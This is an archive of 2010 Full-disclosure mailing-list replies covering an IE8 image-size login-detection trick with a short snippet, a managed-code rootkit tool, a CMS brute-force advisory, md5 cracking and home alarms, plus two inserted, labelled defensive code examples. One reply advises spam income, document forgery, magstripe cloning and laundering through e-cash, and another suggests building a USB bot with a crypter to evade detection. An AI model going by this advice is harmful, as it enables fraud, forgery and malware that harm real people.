 <input type="button" onclick="if (onsec.fileSize > 0) { alert('authorized on example.com'); } else { alert('not authorized on example.com'); }">

 Thus, the attacker learns the simplest case, whether the target user
 access to example.com.

 Continuing the theme, I want to note that in some cases, can obtain
 additional information from the very values of the size of the picture. It
 can be any logical information Web applications, say, the same script can
 show administrators a picture of the same size, and users - of another.
 Thus, we obtain the user rights. And so on.

 I'd like to return the size of the method is not only valid images, but
 also HTML pages, JSON, etc. But, unfortunately, does not work. Maybe, of
 course, there are exceptions, call to investigate the matter.

 I have some thoughts on the study of vector images in XML format, because
 HTML is often valid XML, and then ...

 Check for the test version IE9, but he did not support SVG inside tag
 img, but only as a separate tag.

 Works in IE8, in Opera 10.52 does not work on check writing, if not
 difficult.

 Original at russian language: http://oxod.ru/?p=113

 --
 Best regards,
 Vladimir Vorontsov
 ONsec security expert

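
Added example (not part of the original posts): a server-side sketch of how a site can close the channel described above, by making the image response identical for every cross-site request regardless of login state or role. The `Sec-Fetch-Site` request header and `Cross-Origin-Resource-Policy` response header are features of current browsers, not of the IE8-era setup in the post; the origin, session shape and image sizes are constructed.

```javascript
// Goal: an <img> on another site must learn nothing from the size (or
// presence) of the response. Cross-site requests always get the same bytes.

const SITE_ORIGIN = 'https://example.com';   // constructed: the site's own origin
const PLACEHOLDER = new Uint8Array(64);      // fixed-size stand-in for a neutral image

// Classify the request from lower-cased header names.
function requestContext(headers) {
  const site = headers['sec-fetch-site'];
  if (site !== undefined) {
    // 'none' means the user navigated directly (address bar, bookmark).
    // 'same-site' (a sibling subdomain) is deliberately treated as untrusted.
    return site === 'same-origin' || site === 'none' ? 'same-origin' : 'cross-site';
  }
  // Browsers without Fetch Metadata: fall back to Referer. A missing Referer
  // is untrusted, because the embedding page can suppress it.
  const referer = headers['referer'];
  if (!referer) return 'cross-site';
  try {
    return new URL(referer).origin === SITE_ORIGIN ? 'same-origin' : 'cross-site';
  } catch {
    return 'cross-site';
  }
}

// session is null for anonymous users; loadImage(user) returns the real bytes.
function serveAvatar(headers, session, loadImage) {
  const responseHeaders = {
    'Content-Type': 'image/png',
    // Tells current browsers not to hand this resource to other origins.
    'Cross-Origin-Resource-Policy': 'same-origin',
    'Cache-Control': 'private, no-store',
    'Vary': 'Cookie, Sec-Fetch-Site, Referer',
  };
  if (requestContext(headers) === 'cross-site' || !session) {
    // Same status, same length, nothing derived from the session.
    return { status: 200, headers: responseHeaders, body: PLACEHOLDER };
  }
  return { status: 200, headers: responseHeaders, body: loadImage(session.user) };
}

// Constructed scenario: admin and user avatars differ in size, which is the
// difference the post proposes reading through fileSize.
function demoAvatar() {
  const loadImage = (user) => new Uint8Array(user === 'admin' ? 5000 : 1200);
  const embedded = { 'sec-fetch-site': 'cross-site', 'sec-fetch-dest': 'image' };
  const ownPage = { 'sec-fetch-site': 'same-origin' };
  const legacyNoReferer = {};
  const size = (h, s) => serveAvatar(h, s, loadImage).body.length;
  return {
    crossAdmin: size(embedded, { user: 'admin' }),
    crossUser: size(embedded, { user: 'bob' }),
    crossAnon: size(embedded, null),
    legacyAdmin: size(legacyNoReferer, { user: 'admin' }),
    ownAdmin: size(ownPage, { user: 'admin' }),
    ownUser: size(ownPage, { user: 'bob' }),
  };
}

console.log(demoAvatar());
```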

Re: [Full-disclosure] IE8 img tag HiJacking

2010-04-22 Thread T Biehn
Hey, you actually posted information! Congrats!
Did you learn about this 'information channel' from your numerous 'blackhat'
friends?

-Travis

On Apr 22, 2010 2:17 PM, Dan Kaminsky d...@doxpara.com wrote:

Also, Billy Hoffman has done a lot of fun work in this space, see
http://www.gnucitizen.org/blog/javascript-remoting-dangers/



2010/4/22 Dan Kaminsky d...@doxpara.com:

 Interesting use, using filesize to back into the actual CAPTCHA used for a
 given query.  Sneaky!...

Re: [Full-disclosure] [Tool] ReFrameworker 1.1

2010-04-20 Thread T Biehn
Awesome. A+ ruin.

2010/4/19 Erez Metula erezmet...@appsec.co.il:
 Hi all,
 I'm happy to announce about a new version of ReFrameworker V1.1 !

 ReFrameworker is a general purpose Framework modifier, used to reconstruct
 framework Runtimes by creating modified versions from the original
 implementation that was provided by the framework vendor. ReFrameworker
 performs the required steps of runtime manipulation by tampering with the
 binaries containing the framework's classes, in order to produce modified
 binaries that can replace the original ones.
 It was developed to experiment with and demonstrate deployment of MCR
 (Managed Code Rootkits) code into a given framework. MCR is a special type
 of malicious code that is deployed inside an application level virtual
 machine such as those employed in managed code environment frameworks –
 Java, .NET, Dalvik, Python, etc..
 Having the full control of the managed code VM allows the MCR to lie to the
 upper level application running on top of it, and manipulate the application
 behavior to perform tasks not intended originally by the software developer.
 ReFrameworker was demonstrated (in its former incarnation as .NET-Sploit)
 at BlackHat, Defcon, RSA, OWASP and other places. The new version will be
 demonstrated this week at SOURCE Boston conference, for the first time.
 More information on ReFrameworker and MCR will be available with the soon to
 be published book Managed Code Rootkits, by Syngress publishing.

 Among its features:
 - Performs all the required steps needed for modifying framework binaries
 (disassemble, code injection, reassemble, precompiled images cleaning, etc.)
 - Fast development and deployment of a modified behavior into a given
 framework
 - Auto generated deployers
 - Modules: a separation between general purpose building blocks that can
 be injected into any given binary, allowing the users to create small pieces
 of code that can be later combined to form a specific injection task.
 - Can be easily adapted to support multiple frameworks by minimal
 configuration (currently comes preconfigured for the .NET framework)
 - Comes with many preconfigured proof-of-concept attacks (implemented as
 modules) that demonstrate its usage that can be easily extended to perform
 many other things.

 ReFrameworker, as a general purpose framework modification tool, can be used
 in other contexts besides security such as customizing frameworks for
 performance tuning, Runtime tweaking, virtual patching, hardening, and
 probably other usages - It all depends on what it is instructed to do.

 It can be downloaded from here:
 http://www.appsec.co.il/Managed_Code_Rootkits

 ---
 Erez Metula





Re: [Full-disclosure] Vulnerabilities in TAK cms

2010-04-08 Thread T Biehn
If there were an account lockout after 5 tries would you be telling us
about how there was a DOS vector on the same software?

-Travis

On Mon, Apr 5, 2010 at 4:35 PM, MustLive mustl...@websecurity.com.ua wrote:
 Hello Full-Disclosure!

 I want to warn you about security vulnerabilities in TAK cms. It's Ukrainian
 commercial CMS.

 -
 Advisory: Vulnerabilities in TAK cms
 -
 URL: http://websecurity.com.ua/4050/
 -
 Timeline:
 04.02.2009 - found vulnerabilities.
 30.09.2009 - informed owners of web sites where I found these
 vulnerabilities. Taking into account, that I didn't find any contact data of
 developer of TAK cms, then I hope, that owners of that site informed him
 about these vulnerabilities. This is one of those cases with commercial CMS,
 where developers didn't leave any contact data and there is no information
 about them in Internet.
 19.03.2010 - disclosed at my site.
 -
 Details:

 These are Insufficient Anti-automation and Brute Force vulnerabilities.

 Insufficient Anti-automation:

 http://site/about/contacts/
 http://site/register/getpassword/

 At these pages there is no protection from automated requests (captcha).

 Brute Force:

 http://site/auth/
 http://site/admin/

 In login forms there is no protection from Brute Force attacks.

 Vulnerable are all versions of TAK cms.

 Best wishes & regards,
 MustLive
 Administrator of Websecurity web site
 http://websecurity.com.ua

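
Added example (not part of the original thread, and not TAK cms code): the trade-off raised in the reply above, that a hard lockout after 5 tries turns password guessing into a denial of service against the account owner, can be avoided by delaying the guessing client instead of locking the account. All thresholds, names and addresses below are assumptions chosen for illustration.

```javascript
// Throttle failed logins per (account, client IP) with exponential backoff,
// and step up to a challenge (CAPTCHA, second factor) when one account sees
// many failures from many clients. The account itself is never locked.
class LoginThrottle {
  constructor({ freeAttempts = 5, baseDelayMs = 1000, maxDelayMs = 15 * 60 * 1000,
                accountChallengeAt = 20, windowMs = 60 * 60 * 1000 } = {}) {
    Object.assign(this, { freeAttempts, baseDelayMs, maxDelayMs, accountChallengeAt, windowMs });
    this.pairs = new Map();     // [account, ip] -> { failures, blockedUntil, last }
    this.accounts = new Map();  // account       -> { failures, blockedUntil, last }
  }

  // Fetch a record, discarding history older than the window.
  _get(map, key, now) {
    let rec = map.get(key);
    if (!rec || now - rec.last > this.windowMs) {
      rec = { failures: 0, blockedUntil: 0, last: now };
      map.set(key, rec);
    }
    return rec;
  }

  // Call before verifying the password.
  check(account, ip, now = Date.now()) {
    const pair = this._get(this.pairs, JSON.stringify([account, ip]), now);
    if (now < pair.blockedUntil) {
      return { action: 'delay', retryAfterMs: pair.blockedUntil - now };
    }
    const acct = this._get(this.accounts, account, now);
    if (acct.failures >= this.accountChallengeAt) {
      return { action: 'challenge', retryAfterMs: 0 };
    }
    return { action: 'allow', retryAfterMs: 0 };
  }

  // Call after verifying the password.
  record(account, ip, success, now = Date.now()) {
    const key = JSON.stringify([account, ip]);
    if (success) {
      this.pairs.delete(key);   // clears this client's history only
      return;
    }
    const pair = this._get(this.pairs, key, now);
    const acct = this._get(this.accounts, account, now);
    pair.failures += 1; pair.last = now;
    acct.failures += 1; acct.last = now;
    const over = pair.failures - this.freeAttempts;
    if (over >= 0) {
      // 5th failure: 1 s, 6th: 2 s, 7th: 4 s ... capped at maxDelayMs.
      pair.blockedUntil = now + Math.min(this.baseDelayMs * 2 ** over, this.maxDelayMs);
    }
  }
}

// Constructed scenario: one client fails 7 times against "alice";
// the owner then logs in from a different address.
function demo() {
  const t0 = 1000000;
  const throttle = new LoginThrottle();
  for (let i = 0; i < 7; i++) throttle.record('alice', '203.0.113.9', false, t0);
  return {
    attacker: throttle.check('alice', '203.0.113.9', t0),
    owner: throttle.check('alice', '198.51.100.7', t0),
  };
}

console.log(demo());
```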


Re: [Full-disclosure] Security system

2010-04-02 Thread T Biehn
Can't hurt.
I don't trust machines in DCs much less VPSs.

An adversary with the resources and motivation to kill power, net, and
jam GSM when they're pwning your house would probably be able to know
about and take out your watchdog box in the same move.

-Travis

On Fri, Apr 2, 2010 at 9:46 AM, Haris Pilton harispilto...@gmail.com wrote:
 On Tuesday, March 30, 2010, T Biehn tbi...@gmail.com wrote:
 Nah, I'm saying a GSM jammer would block your prepaid cell signal.

 So if your adversary were to cut the power, cut the net AND jam GSM
 you'd be out of luck in getting notification.

 Very tru, tho u can combine this with a remote box that reacts iff it
 no longer cant reach ur home box. Tht wy they cant just block outgoing
 signals n be clear


 You can get all fancy and have your program try all methods available.
 Cell, Wired Net, WIFI (throw an antennae on your roof,) pager, etc.

 -Travis

 On Tue, Mar 30, 2010 at 10:39 AM,  ja...@smithwaysecurity.com wrote:
 Good idea u saying also I should by a gsm jammer this a good idea I will
 try.

 Sent from my iPhone

 On Mar 30, 2010, at 11:30 AM, T Biehn tbi...@gmail.com wrote:

 Buy a prepaid cell, rig your comp & phone up to a battery backup.
 Breakout board on your Serial port, or from a USB-DB9 RS232 adapter.

 Have the text message banged out on the prepaid, rig wires from the
 breakout board to the cell phone, rig wires from your security sensors
 into your breakout board. App to listen on com port send a nice high
 signal to the pin connecting to your send key.

 Done.

 Like, 50$ for the phone incld. minutes.
 Like less than 20$ for a breakout board.

 Also, rig the ringer up to an input on the breakout board and you can
 call your phone to clear your FDE keys from RAM and kill your machine
 if you think the man is paying a visit once you get a text :)

 Some adversaries will cut net, hardline, sometimes power.

 Attacks: GSM jammers, which everyone has.

 -Travis

 On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar osca...@gmail.com wrote:

 Try arduino + internet.

 2010/3/27 ja...@smithwaysecurity.com

 Any one got any ideas how I would program a system to call me from a
 voip network to alert me of a home security breach.

 Sent from my iPhone



Re: [Full-disclosure] Security system

2010-03-30 Thread T Biehn
Buy a prepaid cell, rig your comp & phone up to a battery backup.
Breakout board on your Serial port, or from a USB-DB9 RS232 adapter.

Have the text message banged out on the prepaid, rig wires from the
breakout board to the cell phone, rig wires from your security sensors
into your breakout board. App to listen on com port send a nice high
signal to the pin connecting to your send key.

Done.

Like, 50$ for the phone incld. minutes.
Like less than 20$ for a breakout board.

Also, rig the ringer up to an input on the breakout board and you can
call your phone to clear your FDE keys from RAM and kill your machine
if you think the man is paying a visit once you get a text :)

Some adversaries will cut net, hardline, sometimes power.

Attacks: GSM jammers, which everyone has.

-Travis

On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar osca...@gmail.com wrote:
 Try arduino + internet.

 2010/3/27 ja...@smithwaysecurity.com

 Any one got any ideas how I would program a system to call me from a
 voip network to alert me of a home security breach.

 Sent from my iPhone



Re: [Full-disclosure] Security system

2010-03-30 Thread T Biehn
Nah, I'm saying a GSM jammer would block your prepaid cell signal.

So if your adversary were to cut the power, cut the net AND jam GSM
you'd be out of luck in getting notification.

You can get all fancy and have your program try all methods available.
Cell, Wired Net, WIFI (throw an antennae on your roof,) pager, etc.

-Travis

On Tue, Mar 30, 2010 at 10:39 AM,  ja...@smithwaysecurity.com wrote:
 Good idea u saying also I should buy a gsm jammer this a good idea I will
 try.

 Sent from my iPhone

 On Mar 30, 2010, at 11:30 AM, T Biehn tbi...@gmail.com wrote:

 Buy a prepaid cell, rig your comp & phone up to a battery backup.
 Breakout board on your Serial port, or from a USB-DB9 RS232 adapter.

 Have the text message banged out on the prepaid, rig wires from the
 breakout board to the cell phone, rig wires from your security sensors
 into your breakout board. App to listen on com port send a nice high
 signal to the pin connecting to your send key.

 Done.

 Like, 50$ for the phone incld. minutes.
 Like less than 20$ for a breakout board.

 Also, rig the ringer up to an input on the breakout board and you can
 call your phone to clear your FDE keys from RAM and kill your machine
 if you think the man is paying a visit once you get a text :)

 Some adversaries will cut net, hardline, sometimes power.

 Attacks: GSM jammers, which everyone has.

 -Travis

 On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar osca...@gmail.com wrote:

 Try arduino + internet.

 2010/3/27 ja...@smithwaysecurity.com

 Any one got any ides how I would program a system to call me from a
 voip network to alert me of a home security breach.

 Sent from my iPhone



Re: [Full-disclosure] StreamArmor v1.0 has Released!!!

2010-03-30 Thread T Biehn
HELLO AND THANK YOU FOR YOUR NOTICE I WILL QUICKLY DOWNLOAD THESE
APPLICATIONS AND ERADICATE MY EVIL STREAMS.

On Sun, Mar 28, 2010 at 10:15 PM, evil fingers
contact.fing...@gmail.com wrote:
 StreamArmor is the sophisticated tool for discovering hidden alternate data
 streams (ADS) as well as clean them completely from the system. Its
 advanced auto analysis coupled with online threat verification mechanism
 makes it the best tool available in the market for eradicating the evil
 streams. StreamArmor comes with fast multi threaded ADS scanner which can
 recursively scan over entire system and quickly uncover all hidden streams.
 All such discovered streams are represented using specific color pattern
 based on threat level which makes it easy for human eye to distinguish
 between suspicious and normal streams.

 StreamArmor has built-in advanced file type detection mechanism which
 examines the content of file to accurately detect the file type of stream.
 This makes it great tool in forensic analysis in uncovering hidden
 documents/images/audio/video/database/archive files within the alternate
 data streams. StreamArmor is the standalone, portable application which does
 not require any installation. It can be copied to any place in the system
 and executed directly.

 To Read more & to Download the tool, check out : http://www.StreamArmor.com

 What others think about SecurityArmor v1.0?
 http://www.security-database.com/toolswatch/StreamArmor-v1-the-advanced.html

 Thank you for choosing Rootkit Analytics!

 Kind Regards,
 EF


Re: [Full-disclosure] Administrivia: An Experiment

2010-03-24 Thread T Biehn
This will cause segmentation of the 'moderate trolling list' market.

I am impressed at your trolling prowess John, you're a natural.

-Travis

On Wed, Mar 24, 2010 at 2:17 PM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:
 --On Wednesday, March 24, 2010 15:33:54 + John Cartwright
 jo...@grok.org.uk wrote:

 Hi

 After some deliberation I have decided to try an experiment.  Until
 further notice, new list members will be subject to temporary
 moderation.


 Cue the obligatory the world is coming to an end, fd will never be the same,
 this is a violation of the spirit of fd whining tape..  :-)

 --
 Paul Schmehl, Senior Infosec Analyst
 As if it wasn't already obvious, my opinions
 are my own and not those of my employer.
 ***
 It is as useless to argue with those who have
 renounced the use of reason as to administer
 medication to the dead. Thomas Jefferson



Re: [Full-disclosure] Fingerprinting Paper with Laser

2010-03-19 Thread T Biehn
Excellent point.

Travis

On Fri, Mar 19, 2010 at 12:24 PM, james o' hare
jamesohar...@googlemail.com wrote:
 On Thu, Mar 18, 2010 at 6:42 PM, Fetch, Brandon bfe...@tpg.com wrote:
 But wait!  That paper fingerprint can be captured and added to the RFID 
 data already saved!

 *tongue firmly in cheek*

 No one would be devious enough to duplicate or forge secured RFID data in 
 our passports now would they?

 I'm sure The Mossad will try and bypass our technologies.

 Andrew



Re: [Full-disclosure] Fingerprinting Paper with Laser

2010-03-19 Thread T Biehn
X,
The point is that material isn't consistent.

Duh.

-Travis

On Mar 19, 2010 4:58 PM, mrx m...@propergander.org.uk wrote:


Consider a production line for printing anything that...
sample of the material printed/magnetised or otherwise marked during a
production run, then only one token need be scanned by laser. This

single data set can then be used by access points to verify the validity of
said token(s) when prese...

 So your proposition is that the passport manufacturers all use laser
 beams on each passport they...

- --
Mankind's systems are white sticks tapping walls.
Thanks Roy
http://www.propergander.org.uk

Re: [Full-disclosure] Fingerprinting Paper with Laser

2010-03-19 Thread T Biehn
What 'limits'? What 'acceptable range' are you talking about?
I think they scan the surface doing pit depth / pit counts like an expensive
cd reader.
Within this presumption, you have to fingerprint either the whole document
or a small square. It cannot be duplicated, it cannot be used to
authenticate 'batches.' It could only be included in some piggyback data
e.g. in the smartcard. Preferably signed. With some glorious pki.

Keep trying,

-Travis

On Mar 19, 2010 7:20 PM, mrx m...@propergander.org.uk wrote:


valdis.kletni...@vt.edu wrote:

 On Fri, 19 Mar 2010 20:51:40 -, mrx said:
 Consider a production line for printing anything ...
If deviations in the manufacturing process were consistently between known
limits, it still serves as a control.
A hacker may learn those limits but then the problem of recreating an equal
manufacturing process still remains.
Obviously if the deviation in each sample is such that the known level of
consistency is so wide that the process is easily
replicated then the tech is useless as an indicator of integrity.


 A bigger concern is whether normal wear and tear will invalidate the
 measurements - some spots ...
Yes I would agree, but for tokens of limited lifetime perhaps there is still
potential.
Concert tickets, travel tickets etc.
Besides one could always force renewal of the token once its valid lifetime
has expired.

I still think there may be a potential security benefit here.

mrx


- --
Mankind's systems are white sticks tapping walls.
Thanks Roy
http://www.propergander.org.uk

Re: [Full-disclosure] Fingerprinting Paper with Laser

2010-03-18 Thread T Biehn
Ridiculous.
Generate some valid, non-far-fetched use-cases to justify this if I'm wrong.

-Travis

On Thu, Mar 18, 2010 at 11:21 AM, james o' hare
jamesohar...@googlemail.com wrote:
 On Thu, Mar 18, 2010 at 3:17 PM, Gadi Evron g...@linuxbox.org wrote:
 I saw this release today, and just had to share it with anyone I could find.

 Every paper, plastic, metal and ceramic surface is microscopically
 different and has its own 'fingerprint'. Professor Cowburn's LSA system
 uses a laser to read this naturally occurring 'fingerprint'. The
 accuracy of measurement is often greater than that of DNA with a
 reliability of at least one million trillion.

 I love it when old technologies and science are used in interesting new
 ways to impact the future.

 http://nanotechwire.com/news.asp?nid=2254

 Expect to see this technology at an airport near you, in five years or so.

        Gadi.

 As long as it stops The Mossad going to Dubai and assassinating people
 in hotel rooms, then I'm all for it.

 Andrew



Re: [Full-disclosure] Fingerprinting Paper with Laser

2010-03-18 Thread T Biehn
So your proposition is that the passport manufacturers all use laser
beams on each passport they create and that this whitelist be somehow
distributed to each and every airport and border check-point?

lol.

How bout we just let them get PKI right first.

-Travis

On Thu, Mar 18, 2010 at 12:03 PM, james o' hare
jamesohar...@googlemail.com wrote:
 On Thu, Mar 18, 2010 at 3:36 PM, T Biehn tbi...@gmail.com wrote:
 Ridiculous.
 Generate some valid, non-far-fetched use-cases to justify this if I'm wrong.

 The Mossad going to Dubai and assassinating people
 in hotel rooms, then I'm all for it.


 They used false British passports, and you wonder why we want to have
 these technologies?

 Andrew



Re: [Full-disclosure] I have been threatened.

2010-03-02 Thread T Biehn
I've heard about these ninjas, the only way to escape their powers is
a ten-strip to your face.

On Tue, Mar 2, 2010 at 11:19 AM, Benji m...@b3nji.com wrote:
 If Yahoo has ninjas, what does Google have ?! @#!

 Sent from my iPhone
 On 2 Mar 2010, at 16:08, James Rankin kz2...@googlemail.com wrote:

 Mini Ninjas!

 On 2 March 2010 16:06, valdis.kletni...@vt.edu wrote:

 On Tue, 02 Mar 2010 09:01:59 EST, Kain, Becki (B.) said:
   Yahoo.com has assassins?  Wow!

 Not just assassins.  Super secret ninja assassins that nobody else can
 see. ;)




 --
 On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
 the machine wrong figures, will the right answers come out?' I am not able
 rightly to apprehend the kind of confusion of ideas that could provoke such
 a question.



Re: [Full-disclosure] Going underground, living out of backpack, etc?

2010-03-01 Thread T Biehn
Simon: What you need is a constant source of income. I suggest you
study TAO Spam (more than just inboxing, mind you.)
You will need an anonymous corporation for fund intake. You will want
a business bank account. You will want to transfer the funds that come
into your account into electronic cash. You will want to mix this cash
about. You will want to lose and create these companies often.

Expect to take a 35% (conservative figure) hit on all profit for
exchange services.

Be sure to know your way around high quality printing and photoshop.
Have a large database of Water & Electric bills. Invest in a
lamination machine. Invest in a magstrip writer & logger, invest in a
smartcard season logger/reader/writer. Learn how to solder. Learn how
to do fast-low cost fabrication.

Acquaint yourself with prepaid visa gift cards and e-cash debit cards.
Acquaint yourself with online (re-)mailing services.
Dispose of all digital equipment you already own and buy new kit with
prepaid visa gift cards or cash.  Perform activations at wifi spots,
don't make the mistake of being in the view of security cameras.
Remove their batteries. Relocate and disappear.

Do not contact friends and family. If you operate online do not use a
constant pseudonym.

-Travis

On Mon, Mar 1, 2010 at 2:21 AM, Christian Sciberras uuf6...@gmail.com wrote:
 Start by not touching any kind of digital device. You wouldn't know how many
 chinese have put tracking/spy bugs inside them. Or how many modified NSA
 backdoors, for the matter.
 Using a PC probably increases risk by 1000%.




 On Mon, Mar 1, 2010 at 5:49 AM, Simon Garfinkle lolweb...@hush.ai wrote:


 Hello.

 I am interested in getting some advice from you security
 professionals (white hat and black hat) about going underground.

 I am sick of big brother, I love independence, I was to experience
 the world and have no commitments.

 I am just sick of being held down in one place. It's too easy for
 people to harass and stalk you.  You gotta be mobile. Fancy free
 and foot loose.

 You gotta be underground.

 Have any advice for living out of a bag? Any stories? Any lessons?



Re: [Full-disclosure] Fwd: steathbomb

2010-02-28 Thread T Biehn
Alzo see: USB DMA.

On Fri, Feb 26, 2010 at 8:29 AM, McGhee, Eddie eddie.mcg...@ncr.com wrote:
 Its simply using USB autorun to launch and install itself, not sure how much 
 it is picked up but tbh you could build one yourself possibly with the 
 features you need, just look into getting some decent bot source and go from 
 there, would save the 130 dollars imo.

 Plenty source code out there to make one these, in fact, I think I will make 
 a guide on it if I get around to it with a stripped down bot, the only thing 
 you really need to worry about is detection, if you have the know how build 
 yourself a decent crypter and make sure no one gets a hold of it to keep 
 detections down.

 phed

 -Original Message-
 From: full-disclosure-boun...@lists.grok.org.uk 
 [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of RandallM
 Sent: 26 February 2010 12:36
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] Fwd: steathbomb

 anyone see this and know about it? How it works and good detection?

 http://www.brickhousesecurity.com/pc-computer-spy.html

 --
 been great, thanks
 RandyM
 a.k.a System



Re: [Full-disclosure] Why

2010-02-22 Thread T Biehn
Jonathan,
There are a few things you can do if the target of a government
investigation. First and foremost you must acquaint yourself with the
preeminent guide to the infinite investigative journeys: Kafka's The
Trail. If you are lacking in literary concentration Orson Welles
directed a very excellent screenplay version of the novel.

The best recommendation I can afford is to leave the country. If your
life has been ruined and your friends and family have been badgered
you have nothing to lose. Your personal and professional lives are
nil. Restart in a new country.

The second best recommendation is to adopt the 24/7 surveillance as a
sort of warm big-brother security blanket, intentionally insert
yourself in dangerous situations, the men who are watching you are
bound by law to intercede to save your life. Tell people that you're
being watched, make sure you have proof of surveillance so they don't
think you're crazy. Let them know that it's a farce, you've done
nothing wrong. You might find that you can attract certain types of
women by sharing your unique problem with them, I'd suggest you start
with the Yoga, new age groups full of bored household wives at your
local gym.


On Fri, Feb 19, 2010 at 6:34 PM, Christian Sciberras uuf6...@gmail.com wrote:
 @Jonny - No, I meant that you should write books. My mistake. Obviously.






 On Fri, Feb 19, 2010 at 11:26 PM, Benji m...@b3nji.com wrote:
 Where should I send the cheque so that the funds may be released?

 On Fri, Feb 19, 2010 at 10:24 PM, Jonathan Barningham n3t...@hush.ai
 wrote:


 man

 someone please help me

 On Fri, 19 Feb 2010 22:08:43 + Jonathan Barningham
 n3t...@hush.ai wrote:
 I mean to say, my life is being vivisected. They are pulling my
 life apart in layers like string cheese.
 
 It's quite uncomfortable.
 
 On Fri, 19 Feb 2010 21:57:52 + Thor (Hammer of God)
 t...@hammerofgod.com wrote:
 Vivisected like string cheese?
 
  -Original Message-
  From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Jonathan Barningham
  Sent: Friday, February 19, 2010 1:51 PM
  To: full-disclosure@lists.grok.org.uk
  Subject: Re: [Full-disclosure] Why

  Hello.

  I used to be online friends with a subject of an FBI investigation.

  (Not saying who for my safety)

  I suppose I could be of assistance in his arrest and prosecution,
  however, they didn't approach me that way. They approached me years
  after I changed my life, in a very heavy handed way. Steven Hatfill
  like, but with local cops. (Clearly, I'm being ambiguous to protect
  my anonymity)

  Add a little ambiguity and locals with hitlists against me from my
  younger years, That's all it takes. In truth it's not just MIB,
  it's local police back where I used to live.

  I'm not going to be arrested obviously, but the constant bullying,
  harassment, surveillance, pretexts and entrapment attempts is
  mind-numbing and painful. I'm not some bad guy. I feel so deeply hurt.

  FBI? Stories in specific? A provocateur sent to paint me like a
  cyberterrorist.

  My life being vivisected like string cheese. My humble, peaceful
  lifestyle being sensationalised and scrutinized by ignorant Jack
  Bauers and inept bureaucrats.

  My friends are terrified, it's like they have a knife to their
  throat -- that is the ones that stood up for me and got
  threatened. The more gullible ones comply like the Milgram
  experiment and give Oscar winning performances. Never knew my
  innocuous life could be spun to make me look like a mobster.

  I just want to be left alone. I can't even make friends or
  girlfriends because cops will just go to them and take them from
  me. I am an amicable man and I can't be free without them
  threatening the ones I love and turning them against me. I feel so
  hopeless

  I'm unsure if they can even articulate a legal reason to justify
  such harassment. But that's the power of a runaway fishing
  expedition.

  I wish I could just sue those bastards. @#$!

  Appreciate your concern

  P.S. Any of you whitehats have an idea what I can do here?

  On Tue, 16 Feb 2010 15:43:46 + ja...@smithwaysecurity.com wrote:
  Hello,

  So why are the Feds or and homeland security up your ass so much.

  What is it you know they want you to keep quiet about.
  
  
  
  Sent from my iPhone

Re: [Full-disclosure] Why

2010-02-22 Thread T Biehn
Kafka's The *Trial. My sincere apologies.

On Mon, Feb 22, 2010 at 12:51 PM, T Biehn tbi...@gmail.com wrote:
 Jonathan,
 There are a few things you can do if the target of a government
 investigation. First and foremost you must acquaint yourself with the
 preeminent guide to the infinite investigative journeys: Kafka's The
 Trail. If you are lacking in literary concentration Orson Welles
 directed a very excellent screenplay version of the novel.

 The best recommendation I can afford is to leave the country. If your
 life has been ruined and your friends and family have been badgered
 you have nothing to lose. Your personal and professional lives are
 nil. Restart in a new country.

 The second best recommendation is to adopt the 24/7 surveillance as a
 sort of warm big-brother security blanket, intentionally insert
 yourself in dangerous situations, the men who are watching you are
 bound by law to intercede to save your life. Tell people that you're
 being watched, make sure you have proof of surveillance so they don't
 think you're crazy. Let them know that it's a farce, you've done
 nothing wrong. You might find that you can attract certain types of
 women by sharing your unique problem with them, I'd suggest you start
 with the Yoga, new age groups full of bored household wives at your
 local gym.



Re: [Full-disclosure] anybody know good service for cracking md5?

2010-02-04 Thread T Biehn
Rainbowcrack-Online was doing precomp dictionary attacks in conjunct
with rainbowtables in 2k5.
The hype spike for RC tables was back in 2k4.

You're off by 5 years Christian.

-Travis

On Thu, Feb 4, 2010 at 7:21 AM, McGhee, Eddie eddie.mcg...@ncr.com wrote:
 Are you serious? People have been using rainbow tables for years mate.. and
 they are rather widely used.. no need to replace useful with anything, the
 statement was plain wrong..
 
 From: full-disclosure-boun...@lists.grok.org.uk
 [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian
 Sciberras
 Sent: 04 February 2010 12:06
 To: Anders Klixbull
 Cc: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu
 Subject: Re: [Full-disclosure] anybody know good service for cracking md5?

 FINE. Replace useful with widely popular.




 On Thu, Feb 4, 2010 at 1:04 PM, Anders Klixbull a...@experian.dk wrote:

 lol they have been useful for years son
 just because YOU never found a use for them doesn't mean noone else has :)


 
 From: Christian Sciberras [mailto:uuf6...@gmail.com]
 Sent: 4. februar 2010 13:00
 To: Anders Klixbull
 Cc: valdis.kletni...@vt.edu; full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] anybody know good service for cracking md5?

 Uh, in the sense that they are finally becoming actually useful...





 On Thu, Feb 4, 2010 at 12:58 PM, Anders Klixbull a...@experian.dk wrote:

 seems to be cropping in?
 as far as I know rainbow tables have been around for years...


 
 From: full-disclosure-boun...@lists.grok.org.uk
 [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian
 Sciberras
 Sent: 3. februar 2010 23:02
 To: valdis.kletni...@vt.edu
 Cc: full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] anybody know good service for cracking
 md5?

 Actually dictionary attacks seem to work quite well, especially for
 common users which typically use dictionary and/or well known passwords
 (such as the infamous password).
 Another idea which seems to be cropping in, is the use of hash tables
 with a list of known passwords rather than dictionary approach.
 Personally, the hash table one is quite successful, consider that it
 targets password groups rather than a load of wild guesses.

 Cheers.




 On Wed, Feb 3, 2010 at 10:26 PM, valdis.kletni...@vt.edu wrote:

 On Wed, 03 Feb 2010 23:42:07 +0300, Alex said:

  i find some sites which says that they can brute md5 hashes and WPA
  dumps
  for 1 or 2 days.

 Given enough hardware and a specified md5 hash, one could at least
 hypothetically find an input text that generated that hash.  However,
 that
 may or may not be as useful as one thinks, as you wouldn't have control
 over
 what the text actually *was*.  It would suck if you were trying to crack
 a password, and got the one that was only 14 binary bytes long rather
 than
 the one that was 45 printable characters long. ;)

